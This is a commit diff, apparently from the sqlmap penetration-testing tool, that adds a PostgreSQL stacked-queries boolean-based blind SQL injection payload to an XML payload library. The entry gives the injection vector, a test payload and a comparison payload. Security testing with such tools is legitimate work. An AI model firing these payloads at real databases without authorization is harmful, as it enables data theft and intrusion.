Add boolean-blind for postgreql in stacked-queries

The patch is based on time-based blind exploitation
2025-07-29 09:29:50 +03:00 · 2017-10-05 23:58:29 +02:00 · 2017-10-05 23:58:29 +02:00 · 423a34c9f3
commit 423a34c9f3
parent 09ddb3bd8b
1 changed files with 21 additions and 0 deletions
--- a/xml/payloads/boolean_blind.xml
+++ b/xml/payloads/boolean_blind.xml
@ -525,6 +525,27 @@ Tag: <test>
        </details>
    </test>

+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries (comment) - boolean-based blind</title>
+        <stype>1</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL</vector>
+        <request>
+            <payload>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <comparison>;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL</comparison>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
    <test>
        <title>Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>
        <stype>1</stype>